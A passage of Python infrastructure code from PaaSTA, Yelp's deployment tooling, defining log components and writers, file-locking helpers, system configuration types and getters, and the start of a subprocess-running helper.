return PaastaColors.color_text(PaastaColors.DEFAULT, text)
LOG_COMPONENTS = OrderedDict(
[
(
"build",
{
"color": PaastaColors.blue,
"help": "Jenkins build jobs output, like the itest, promotion, security checks, etc.",
"source_env": "devc",
},
),
(
"deploy",
{
"color": PaastaColors.cyan,
"help": "Output from the paasta deploy code. (setup_marathon_job, bounces, etc)",
"additional_source_envs": ["devc"],
},
),
(
"monitoring",
{
"color": PaastaColors.green,
"help": "Logs from Sensu checks for the service",
},
),
(
"marathon",
{
"color": PaastaColors.magenta,
"help": "Logs from Marathon for the service",
},
),
(
"app_output",
{
"color": compose(PaastaColors.yellow, PaastaColors.bold),
"help": "Stderr and stdout of the actual process spawned by Mesos. "
"Convenience alias for both the stdout and stderr components",
},
),
(
"stdout",
{
"color": PaastaColors.yellow,
"help": "Stdout from the process spawned by Mesos.",
},
),
(
"stderr",
{
"color": PaastaColors.yellow,
"help": "Stderr from the process spawned by Mesos.",
},
),
(
"security",
{
"color": PaastaColors.red,
"help": "Logs from security-related services such as firewall monitoring",
},
),
("oom", {"color": PaastaColors.red, "help": "Kernel OOM events."}),
# I'm leaving these planned components here since they provide some hints
# about where we want to go. See PAASTA-78.
#
# But I'm commenting them out so they don't delude users into believing we
# can expose logs that we cannot actually expose. See PAASTA-927.
#
# ('app_request', {
# 'color': PaastaColors.bold,
# 'help': 'The request log for the service. Defaults to "service_NAME_requests"',
# 'command': 'scribe_reader -e ENV -f service_example_happyhour_requests',
# }),
# ('app_errors', {
# 'color': PaastaColors.red,
# 'help': 'Application error log, defaults to "stream_service_NAME_errors"',
# 'command': 'scribe_reader -e ENV -f stream_service_SERVICE_errors',
# }),
# ('lb_requests', {
# 'color': PaastaColors.bold,
# 'help': 'All requests from Smartstack haproxy',
# 'command': 'NA - TODO: SRV-1130',
# }),
# ('lb_errors', {
# 'color': PaastaColors.red,
# 'help': 'Logs from Smartstack haproxy that have 400-500 error codes',
# 'command': 'scribereader -e ENV -f stream_service_errors | grep SERVICE.instance',
# }),
]
)
class NoSuchLogComponent(Exception):
pass
def validate_log_component(component: str) -> bool:
if component in LOG_COMPONENTS.keys():
return True
else:
raise NoSuchLogComponent
def get_git_url(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> str:
"""Get the git url for a service. Assumes that the service's
repo matches its name, and that it lives in services- i.e.
if this is called with the string 'test', the returned
url will be git@git.yelpcorp.com:services/test.
:param service: The service name to get a URL for
:returns: A git url to the service's repository"""
general_config = service_configuration_lib.read_service_configuration(
service, soa_dir=soa_dir
)
default_location = "git@git.yelpcorp.com:services/%s" % service
return general_config.get("git_url", default_location)
def get_service_docker_registry(
service: str,
soa_dir: str = DEFAULT_SOA_DIR,
system_config: Optional["SystemPaastaConfig"] = None,
) -> str:
if service is None:
raise NotImplementedError('"None" is not a valid service')
service_configuration = service_configuration_lib.read_service_configuration(
service, soa_dir
)
try:
return service_configuration["docker_registry"]
except KeyError:
if not system_config:
system_config = load_system_paasta_config()
return system_config.get_system_docker_registry()
class NoSuchLogLevel(Exception):
pass
class LogWriterConfig(TypedDict):
driver: str
options: Dict
class LogReaderConfig(TypedDict):
driver: str
options: Dict
# The active log writer.
_log_writer = None
# The map of name -> LogWriter subclasses, used by configure_log.
_log_writer_classes = {}
class LogWriter:
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
_LogWriterTypeT = TypeVar("_LogWriterTypeT", bound=Type[LogWriter])
def register_log_writer(name: str) -> Callable[[_LogWriterTypeT], _LogWriterTypeT]:
"""Returns a decorator that registers that log writer class at a given name
so get_log_writer_class can find it."""
def outer(log_writer_class: _LogWriterTypeT) -> _LogWriterTypeT:
_log_writer_classes[name] = log_writer_class
return log_writer_class
return outer
def get_log_writer_class(name: str) -> Type[LogWriter]:
return _log_writer_classes[name]
def list_log_writers() -> Iterable[str]:
return _log_writer_classes.keys()
def configure_log() -> None:
"""We will log to the yocalhost binded scribe."""
log_writer_config = load_system_paasta_config().get_log_writer()
global _log_writer
LogWriterClass = get_log_writer_class(log_writer_config["driver"])
_log_writer = LogWriterClass(**log_writer_config.get("options", {}))
def _log(
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
return _log_writer.log(
service=service,
line=line,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_audit(
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
user = get_username()
host = get_hostname()
return _log_writer.log_audit(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
def _now() -> str:
return datetime.datetime.utcnow().isoformat()
def remove_ansi_escape_sequences(line: str) -> str:
"""Removes ansi escape sequences from the given line."""
return no_escape.sub("", line)
def format_log_line(
level: str,
cluster: str,
service: str,
instance: str,
component: str,
line: str,
timestamp: str = None,
) -> str:
"""Accepts a string 'line'.
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains 'line'.
"""
validate_log_component(component)
if not timestamp:
timestamp = _now()
line = remove_ansi_escape_sequences(line.strip())
message = json.dumps(
{
"timestamp": timestamp,
"level": level,
"cluster": cluster,
"service": service,
"instance": instance,
"component": component,
"message": line,
},
sort_keys=True,
)
return message
def format_audit_log_line(
cluster: str,
instance: str,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
timestamp: str = None,
) -> str:
"""Accepts:
* a string 'user' describing the user that initiated the action
* a string 'host' describing the server where the user initiated the action
* a string 'action' describing an action performed by paasta_tools
* a dict 'action_details' optional information about the action
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains details about an action performed on
a service/instance.
"""
if not timestamp:
timestamp = _now()
if not action_details:
action_details = {}
message = json.dumps(
{
"timestamp": timestamp,
"cluster": cluster,
"service": service,
"instance": instance,
"user": user,
"host": host,
"action": action,
"action_details": action_details,
},
sort_keys=True,
)
return message
def get_log_name_for_service(service: str, prefix: str = None) -> str:
if prefix:
return f"stream_paasta_{prefix}_{service}"
return "stream_paasta_%s" % service
try:
import clog
# Somehow clog turns on DeprecationWarnings, so we need to disable them
# again after importing it.
warnings.filterwarnings("ignore", category=DeprecationWarning)
@register_log_writer("scribe")
class ScribeLogWriter(LogWriter):
def __init__(
self,
scribe_host: str = "169.254.255.254",
scribe_port: int = 1463,
scribe_disable: bool = False,
**kwargs: Any,
) -> None:
clog.config.configure(
scribe_host=scribe_host,
scribe_port=scribe_port,
scribe_disable=scribe_disable,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
"""This expects someone (currently the paasta cli main()) to have already
configured the log object. We'll just write things to it.
"""
if level == "event":
paasta_print(f"[service {service}] {line}", file=sys.stdout)
elif level == "debug":
paasta_print(f"[service {service}] {line}", file=sys.stderr)
else:
raise NoSuchLogLevel
log_name = get_log_name_for_service(service)
formatted_line = format_log_line(
level, cluster, service, instance, component, line
)
clog.log_line(log_name, formatted_line)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
log_name = AUDIT_LOG_STREAM
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
clog.log_line(log_name, formatted_line)
except ImportError:
warnings.warn("clog is unavailable")
@register_log_writer("null")
class NullLogWriter(LogWriter):
"""A LogWriter class that doesn't do anything. Primarily useful for integration tests where we don't care about
logs."""
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
@contextlib.contextmanager
def _empty_context() -> Iterator[None]:
yield
_AnyIO = Union[io.IOBase, IO]
@register_log_writer("file")
class FileLogWriter(LogWriter):
def __init__(
self,
path_format: str,
mode: str = "a+",
line_delimiter: str = "\n",
flock: bool = False,
) -> None:
self.path_format = path_format
self.mode = mode
self.flock = flock
self.line_delimiter = line_delimiter
def maybe_flock(self, fd: _AnyIO) -> ContextManager:
if self.flock:
# https://github.com/python/typeshed/issues/1548
return flock(fd)
else:
return _empty_context()
def format_path(
self, service: str, component: str, level: str, cluster: str, instance: str
) -> str:
return self.path_format.format(
service=service,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_message(self, path: str, message: str) -> None:
# We use io.FileIO here because it guarantees that write() is implemented with a single write syscall,
# and on Linux, writes to O_APPEND files with a single write syscall are atomic.
#
# https://docs.python.org/2/library/io.html#io.FileIO
# http://article.gmane.org/gmane.linux.kernel/43445
try:
with io.FileIO(path, mode=self.mode, closefd=True) as f:
with self.maybe_flock(f):
f.write(message.encode("UTF-8"))
except IOError as e:
paasta_print(
"Could not log to {}: {}: {} -- would have logged: {}".format(
path, type(e).__name__, str(e), message
),
file=sys.stderr,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(service, component, level, cluster, instance)
to_write = "{}{}".format(
format_log_line(level, cluster, service, instance, component, line),
self.line_delimiter,
)
self._log_message(path, to_write)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(AUDIT_LOG_STREAM, "", "", cluster, instance)
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
to_write = f"{formatted_line}{self.line_delimiter}"
self._log_message(path, to_write)
@contextlib.contextmanager
def flock(fd: _AnyIO) -> Iterator[None]:
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(fd.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def timed_flock(fd: _AnyIO, seconds: int = 1) -> Iterator[None]:
""" Attempt to grab an exclusive flock with a timeout. Uses Timeout, so will
raise a TimeoutError if `seconds` elapses before the flock can be obtained
"""
# We don't want to wrap the user code in the timeout, just the flock grab
flock_context = flock(fd)
with Timeout(seconds=seconds):
flock_context.__enter__()
try:
yield
finally:
flock_context.__exit__(*sys.exc_info())
def _timeout(process: Popen) -> None:
"""Helper function for _run. It terminates the process.
Doesn't raise OSError, if we try to terminate a non-existing
process as there can be a very small window between poll() and kill()
"""
if process.poll() is None:
try:
# sending SIGKILL to the process
process.kill()
except OSError as e:
# No such process error
# The process could have been terminated meanwhile
if e.errno != errno.ESRCH:
raise
class PaastaNotConfiguredError(Exception):
pass
class NoConfigurationForServiceError(Exception):
pass
def get_readable_files_in_glob(glob: str, path: str) -> List[str]:
"""
Returns a sorted list of files that are readable in an input glob by recursively searching a path
"""
globbed_files = []
for root, dirs, files in os.walk(path):
for f in files:
fn = os.path.join(root, f)
if os.path.isfile(fn) and os.access(fn, os.R_OK) and fnmatch(fn, glob):
globbed_files.append(fn)
return sorted(globbed_files)
class ClusterAutoscalingResource(TypedDict):
type: str
id: str
region: str
pool: str
min_capacity: int
max_capacity: int
IdToClusterAutoscalingResourcesDict = Dict[str, ClusterAutoscalingResource]
class ResourcePoolSettings(TypedDict):
target_utilization: float
drain_timeout: int
PoolToResourcePoolSettingsDict = Dict[str, ResourcePoolSettings]
class ChronosConfig(TypedDict, total=False):
user: str
password: str
url: List[str]
class MarathonConfigDict(TypedDict, total=False):
user: str
password: str
url: List[str]
class LocalRunConfig(TypedDict, total=False):
default_cluster: str
class RemoteRunConfig(TypedDict, total=False):
default_role: str
class SparkRunConfig(TypedDict, total=False):
default_cluster: str
default_pool: str
class PaastaNativeConfig(TypedDict, total=False):
principal: str
secret: str
ExpectedSlaveAttributes = List[Dict[str, Any]]
class KubeKindDict(TypedDict, total=False):
singular: str
plural: str
class KubeCustomResourceDict(TypedDict, total=False):
version: str
file_prefix: str
kube_kind: KubeKindDict
group: str
class SystemPaastaConfigDict(TypedDict, total=False):
api_endpoints: Dict[str, str]
auth_certificate_ttl: str
auto_hostname_unique_size: int
cluster: str
cluster_autoscaler_max_decrease: float
cluster_autoscaler_max_increase: float
cluster_autoscaling_draining_enabled: bool
cluster_autoscaling_resources: IdToClusterAutoscalingResourcesDict
cluster_boost_enabled: bool
cluster_fqdn_format: str
clusters: Sequence[str]
dashboard_links: Dict[str, Dict[str, str]]
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
deployd_big_bounce_deadline: float
deployd_log_level: str
deployd_maintenance_polling_frequency: int
deployd_metrics_provider: str
deployd_number_workers: int
deployd_startup_bounce_deadline: float
deployd_startup_oracle_enabled: bool
deployd_worker_failure_backoff_factor: int
deployd_use_zk_queue: bool
disabled_watchers: List
docker_registry: str
dockercfg_location: str
enable_client_cert_auth: bool
enable_nerve_readiness_check: bool
enforce_disk_quota: bool
expected_slave_attributes: ExpectedSlaveAttributes
filter_bogus_mesos_cputime_enabled: bool
fsm_template: str
hacheck_sidecar_image_url: str
kubernetes_custom_resources: List[KubeCustomResourceDict]
kubernetes_use_hacheck_sidecar: bool
local_run_config: LocalRunConfig
log_reader: LogReaderConfig
log_writer: LogWriterConfig
maintenance_resource_reservation_enabled: bool
marathon_servers: List[MarathonConfigDict]
mesos_config: Dict
metrics_provider: str
monitoring_config: Dict
nerve_readiness_check_script: str
paasta_native: PaastaNativeConfig
pki_backend: str
previous_marathon_servers: List[MarathonConfigDict]
register_k8s_pods: bool
register_marathon_services: bool
register_native_services: bool
remote_run_config: RemoteRunConfig
resource_pool_settings: PoolToResourcePoolSettingsDict
secret_provider: str
security_check_command: str
sensu_host: str
sensu_port: int
slack: Dict[str, str]
spark_run_config: SparkRunConfig
synapse_haproxy_url_format: str
synapse_host: str
synapse_port: int
taskproc: Dict
tron: Dict
vault_cluster_map: Dict
vault_environment: str
volumes: List[DockerVolume]
zookeeper: str
def load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Reads Paasta configs in specified directory in lexicographical order and deep merges
the dictionaries (last file wins).
"""
if not os.path.isdir(path):
raise PaastaNotConfiguredError(
"Could not find system paasta configuration directory: %s" % path
)
if not os.access(path, os.R_OK):
raise PaastaNotConfiguredError(
"Could not read from system paasta configuration directory: %s" % path
)
try:
file_stats = frozenset(
{
(fn, os.stat(fn))
for fn in get_readable_files_in_glob(glob="*.json", path=path)
}
)
return parse_system_paasta_config(file_stats, path)
except IOError as e:
raise PaastaNotConfiguredError(
f"Could not load system paasta config file {e.filename}: {e.strerror}"
)
def optionally_load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Tries to load the system paasta config, but will return an empty configuration if not available,
without raising.
"""
try:
return load_system_paasta_config(path=path)
except PaastaNotConfiguredError:
return SystemPaastaConfig({}, "")
@lru_cache()
def parse_system_paasta_config(
file_stats: FrozenSet[Tuple[str, os.stat_result]], path: str
) -> "SystemPaastaConfig":
"""Pass in a dictionary of filename -> os.stat_result, and this returns the merged parsed configs"""
config: SystemPaastaConfigDict = {}
for filename, _ in file_stats:
with open(filename) as f:
config = deep_merge_dictionaries(
json.load(f), config, allow_duplicate_keys=False
)
return SystemPaastaConfig(config, path)
class SystemPaastaConfig:
def __init__(self, config: SystemPaastaConfigDict, directory: str) -> None:
self.directory = directory
self.config_dict = config
def __eq__(self, other: Any) -> bool:
if isinstance(other, SystemPaastaConfig):
return (
self.directory == other.directory
and self.config_dict == other.config_dict
)
return False
def __repr__(self) -> str:
return f"SystemPaastaConfig({self.config_dict!r}, {self.directory!r})"
def get_zk_hosts(self) -> str:
"""Get the zk_hosts defined in this hosts's cluster config file.
Strips off the zk:// prefix, if it exists, for use with Kazoo.
:returns: The zk_hosts specified in the paasta configuration
"""
try:
hosts = self.config_dict["zookeeper"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find zookeeper connection string in configuration directory: %s"
% self.directory
)
# how do python strings not have a method for doing this
if hosts.startswith("zk://"):
return hosts[len("zk://") :]
return hosts
def get_system_docker_registry(self) -> str:
"""Get the docker_registry defined in this host's cluster config file.
:returns: The docker_registry specified in the paasta configuration
"""
try:
return self.config_dict["docker_registry"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find docker registry in configuration directory: %s"
% self.directory
)
def get_volumes(self) -> Sequence[DockerVolume]:
"""Get the volumes defined in this host's volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
return self.config_dict["volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find volumes in configuration directory: %s" % self.directory
)
def get_cluster(self) -> str:
"""Get the cluster defined in this host's cluster config file.
:returns: The name of the cluster defined in the paasta configuration
"""
try:
return self.config_dict["cluster"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find cluster in configuration directory: %s" % self.directory
)
def get_dashboard_links(self) -> Mapping[str, Mapping[str, str]]:
return self.config_dict["dashboard_links"]
def get_auto_hostname_unique_size(self) -> int:
"""
We automatically add a ["hostname", "UNIQUE"] constraint to "small" services running in production clusters.
If there are less than or equal to this number of instances, we consider it small.
We fail safe and return -1 to avoid adding the ['hostname', 'UNIQUE'] constraint if this value is not defined
:returns: The integer size of a small service
"""
return self.config_dict.get("auto_hostname_unique_size", -1)
def get_api_endpoints(self) -> Mapping[str, str]:
return self.config_dict["api_endpoints"]
def get_enable_client_cert_auth(self) -> bool:
"""
If enabled present a client certificate from ~/.paasta/pki/<cluster>.crt and ~/.paasta/pki/<cluster>.key
"""
return self.config_dict.get("enable_client_cert_auth", True)
def get_enforce_disk_quota(self) -> bool:
"""
If enabled, add `--storage-opt size=SIZE` arg to `docker run` calls,
enforcing the disk quota as a result.
Please note that this should be enabled only for a suported environment
(which at the moment is only `overlay2` driver backed by `XFS`
filesystem mounted with `prjquota` option) otherwise Docker will fail
to start.
"""
return self.config_dict.get("enforce_disk_quota", False)
def get_auth_certificate_ttl(self) -> str:
"""
How long to request for ttl on auth certificates. Note that this maybe limited
by policy in Vault
"""
return self.config_dict.get("auth_certificate_ttl", "11h")
def get_pki_backend(self) -> str:
"""
The Vault pki backend to use for issueing certificates
"""
return self.config_dict.get("pki_backend", "paastaca")
def get_fsm_template(self) -> str:
fsm_path = os.path.dirname(paasta_tools.cli.fsm.__file__)
template_path = os.path.join(fsm_path, "template")
return self.config_dict.get("fsm_template", template_path)
def get_log_writer(self) -> LogWriterConfig:
"""Get the log_writer configuration out of global paasta config
:returns: The log_writer dictionary.
"""
try:
return self.config_dict["log_writer"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_writer in configuration directory: %s"
% self.directory
)
def get_log_reader(self) -> LogReaderConfig:
"""Get the log_reader configuration out of global paasta config
:returns: the log_reader dictionary.
"""
try:
return self.config_dict["log_reader"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_reader in configuration directory: %s"
% self.directory
)
def get_metrics_provider(self) -> Optional[str]:
"""Get the metrics_provider configuration out of global paasta config
:returns: A string identifying the metrics_provider
"""
deployd_metrics_provider = self.config_dict.get("deployd_metrics_provider")
if deployd_metrics_provider is not None:
return deployd_metrics_provider
return self.config_dict.get("metrics_provider")
def get_deployd_worker_failure_backoff_factor(self) -> int:
"""Get the factor for calculating exponential backoff when a deployd worker
fails to bounce a service
:returns: An integer
"""
return self.config_dict.get("deployd_worker_failure_backoff_factor", 30)
def get_deployd_maintenance_polling_frequency(self) -> int:
"""Get the frequency in seconds that the deployd maintenance watcher should
poll mesos's api for new draining hosts
:returns: An integer
"""
return self.config_dict.get("deployd_maintenance_polling_frequency", 30)
def get_deployd_startup_oracle_enabled(self) -> bool:
"""This controls whether deployd will add all services that need a bounce on
startup. Generally this is desirable behavior. If you are performing a bounce
of *all* services you will want to disable this.
:returns: A boolean
"""
return self.config_dict.get("deployd_startup_oracle_enabled", True)
def get_sensu_host(self) -> str:
"""Get the host that we should send sensu events to.
:returns: the sensu_host string, or localhost if not specified.
"""
return self.config_dict.get("sensu_host", "localhost")
def get_sensu_port(self) -> int:
"""Get the port that we should send sensu events to.
:returns: the sensu_port value as an integer, or 3030 if not specified.
"""
return int(self.config_dict.get("sensu_port", 3030))
def get_dockercfg_location(self) -> str:
"""Get the location of the dockerfile, as a URI.
:returns: the URI specified, or file:///root/.dockercfg if not specified.
"""
return self.config_dict.get("dockercfg_location", DEFAULT_DOCKERCFG_LOCATION)
def get_synapse_port(self) -> int:
"""Get the port that haproxy-synapse exposes its status on. Defaults to 3212.
:returns: the haproxy-synapse status port."""
return int(self.config_dict.get("synapse_port", 3212))
def get_default_synapse_host(self) -> str:
"""Get the default host we should interrogate for haproxy-synapse state.
:returns: A hostname that is running haproxy-synapse."""
return self.config_dict.get("synapse_host", "localhost")
def get_synapse_haproxy_url_format(self) -> str:
"""Get a format string for the URL to query for haproxy-synapse state. This format string gets two keyword
arguments, host and port. Defaults to "http://{host:s}:{port:d}/;csv;norefresh".
:returns: A format string for constructing the URL of haproxy-synapse's status page."""
return self.config_dict.get(
"synapse_haproxy_url_format", DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT
)
def get_cluster_autoscaling_resources(self) -> IdToClusterAutoscalingResourcesDict:
return self.config_dict.get("cluster_autoscaling_resources", {})
def get_cluster_autoscaling_draining_enabled(self) -> bool:
""" Enable mesos maintenance mode and trigger draining of instances before the
autoscaler terminates the instance.
:returns A bool"""
return self.config_dict.get("cluster_autoscaling_draining_enabled", True)
def get_cluster_autoscaler_max_increase(self) -> float:
""" Set the maximum increase that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_increase", 0.2)
def get_cluster_autoscaler_max_decrease(self) -> float:
""" Set the maximum decrease that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_decrease", 0.1)
def get_maintenance_resource_reservation_enabled(self) -> bool:
""" Enable un/reserving of resources when we un/drain a host in mesos maintenance
*and* after tasks are killed in setup_marathon_job etc.
:returns A bool"""
return self.config_dict.get("maintenance_resource_reservation_enabled", True)
def get_cluster_boost_enabled(self) -> bool:
""" Enable the cluster boost. Note that the boost only applies to the CPUs.
If the boost is toggled on here but not configured, it will be transparent.
:returns A bool: True means cluster boost is enabled."""
return self.config_dict.get("cluster_boost_enabled", False)
def get_resource_pool_settings(self) -> PoolToResourcePoolSettingsDict:
return self.config_dict.get("resource_pool_settings", {})
def get_cluster_fqdn_format(self) -> str:
"""Get a format string that constructs a DNS name pointing at the paasta masters in a cluster. This format
string gets one parameter: cluster. Defaults to 'paasta-{cluster:s}.yelp'.
:returns: A format string for constructing the FQDN of the masters in a given cluster."""
return self.config_dict.get("cluster_fqdn_format", "paasta-{cluster:s}.yelp")
def get_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("marathon_servers", [])
def get_previous_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("previous_marathon_servers", [])
def get_local_run_config(self) -> LocalRunConfig:
"""Get the local-run config
:returns: The local-run job config dictionary"""
return self.config_dict.get("local_run_config", {})
def get_remote_run_config(self) -> RemoteRunConfig:
"""Get the remote-run config
:returns: The remote-run system_paasta_config dictionary"""
return self.config_dict.get("remote_run_config", {})
def get_spark_run_config(self) -> SparkRunConfig:
"""Get the spark-run config
:returns: The spark-run system_paasta_config dictionary"""
return self.config_dict.get("spark_run_config", {})
def get_paasta_native_config(self) -> PaastaNativeConfig:
return self.config_dict.get("paasta_native", {})
def get_mesos_cli_config(self) -> Dict:
"""Get the config for mesos-cli
:returns: The mesos cli config
"""
return self.config_dict.get("mesos_config", {})
def get_monitoring_config(self) -> Dict:
"""Get the monitoring config
:returns: the monitoring config dictionary"""
return self.config_dict.get("monitoring_config", {})
def get_deploy_blacklist(self) -> DeployBlacklist:
"""Get global blacklist. This applies to all services
in the cluster
:returns: The blacklist
"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""Get global whitelist. This applies to all services
in the cluster
:returns: The whitelist
"""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_expected_slave_attributes(self) -> ExpectedSlaveAttributes:
"""Return a list of dictionaries, representing the expected combinations of attributes in this cluster. Used for
calculating the default routing constraints."""
return self.config_dict.get("expected_slave_attributes")
def get_security_check_command(self) -> Optional[str]:
"""Get the script to be executed during the security-check build step
:return: The name of the file
"""
return self.config_dict.get("security_check_command", None)
def get_deployd_number_workers(self) -> int:
"""Get the number of workers to consume deployment q
:return: integer
"""
return self.config_dict.get("deployd_number_workers", 4)
def get_deployd_big_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances for SystemPaastaConfig
changes.
:return: float
"""
return float(
self.config_dict.get("deployd_big_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_startup_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances on deployd startup.
:return: float
"""
return float(
self.config_dict.get("deployd_startup_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_log_level(self) -> str:
"""Get the log level for paasta-deployd
:return: string name of python logging level, e.g. INFO, DEBUG etc.
"""
return self.config_dict.get("deployd_log_level", "INFO")
def get_deployd_use_zk_queue(self) -> bool:
return self.config_dict.get("deployd_use_zk_queue", True)
def get_hacheck_sidecar_image_url(self) -> str:
"""Get the docker image URL for the hacheck sidecar container"""
return self.config_dict.get(
"hacheck_sidecar_image_url",
"docker-paasta.yelpcorp.com:443/hacheck-k8s-sidecar",
)
def get_register_k8s_pods(self) -> bool:
"""Enable registration of k8s services in nerve"""
return self.config_dict.get("register_k8s_pods", False)
def get_kubernetes_custom_resources(self) -> Sequence[KubeCustomResourceDict]:
"""List of custom resources that should be synced by setup_kubernetes_cr """
return self.config_dict.get("kubernetes_custom_resources", [])
def get_kubernetes_use_hacheck_sidecar(self) -> bool:
return self.config_dict.get("kubernetes_use_hacheck_sidecar", True)
def get_register_marathon_services(self) -> bool:
"""Enable registration of marathon services in nerve"""
return self.config_dict.get("register_marathon_services", True)
def get_register_native_services(self) -> bool:
"""Enable registration of native paasta services in nerve"""
return self.config_dict.get("register_native_services", False)
def get_nerve_readiness_check_script(self) -> str:
"""Script to check service is up in smartstack"""
return self.config_dict.get(
"nerve_readiness_check_script", "/check_smartstack_up.sh"
)
def get_taskproc(self) -> Dict:
return self.config_dict.get("taskproc", {})
def get_disabled_watchers(self) -> List:
return self.config_dict.get("disabled_watchers", [])
def get_vault_environment(self) -> Optional[str]:
""" Get the environment name for the vault cluster
This must match the environment keys in the secret json files
used by all services in this cluster"""
return self.config_dict.get("vault_environment")
def get_vault_cluster_config(self) -> dict:
""" Get a map from paasta_cluster to vault ecosystem. We need
this because not every ecosystem will have its own vault cluster"""
return self.config_dict.get("vault_cluster_map", {})
def get_secret_provider_name(self) -> str:
""" Get the name for the configured secret_provider, used to
decrypt secrets"""
return self.config_dict.get("secret_provider", "paasta_tools.secret_providers")
def get_slack_token(self) -> str:
""" Get a slack token for slack notifications. Returns None if there is
none available """
return self.config_dict.get("slack", {}).get("token", None)
def get_tron_config(self) -> dict:
return self.config_dict.get("tron", {})
def get_clusters(self) -> Sequence[str]:
return self.config_dict.get("clusters", [])
def _run(
command: Union[str, List[str]],
env: Mapping[str, str] = os.environ,
timeout: float = None,
log: bool = False,
stream: bool = False,
stdin: Any = None,
stdin_interrupt: bool = False,
popen_kwargs: Dict = {},
**kwargs: Any,
) -> Tuple[int, str]:
"""Given a command, run it. Return a tuple of the return code and any
output.
:param timeout: If specified, the command will be terminated after timeout
seconds.
:param log: If True, the _log will be handled by _run. If set, it is mandatory
to pass at least a :service: and a :component: parameter. Optionally you
can pass :cluster:, :instance: and :loglevel: parameters for logging.
We wanted to use plumbum instead of rolling our own thing with
subprocess.Popen but were blocked by
https://github.com/tomerfiliba/plumbum/issues/162 and our local BASH_FUNC
magic.
"""
output = []
if log:
service = kwargs["service"]
component = kwargs["component"]
cluster = kwargs.get("cluster", ANY_CLUSTER)
instance = kwargs.get("instance", ANY_INSTANCE)
loglevel = kwargs.get("loglevel", DEFAULT_LOGLEVEL)
try:
if not isinstance(command, list):
command = shlex.split(command)
popen_kwargs["stdout"] = PIPE
popen_kwargs["stderr"] = STDOUT
popen_kwargs["stdin"] = stdin
popen_kwargs["env"] = env
process = Popen(command, **popen_kwargs)
if stdin_interrupt:
def signal_handler(signum: int, frame: FrameType) -> None:
process.stdin.write("\n".encode("utf-8"))
process.stdin.flush()
process.wait()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# start the timer if we specified a timeout
if timeout:
proctimer = threading.Timer(timeout, _timeout, [process])
proctimer.start()
for linebytes in iter(process.stdout.readline, b""):
line = linebytes.decode("utf-8", errors="replace").rstrip("\n")
linebytes = linebytes.strip(b"\n")
# additional indentation is for the paasta status command only
if stream:
paasta_print(linebytes)
else:
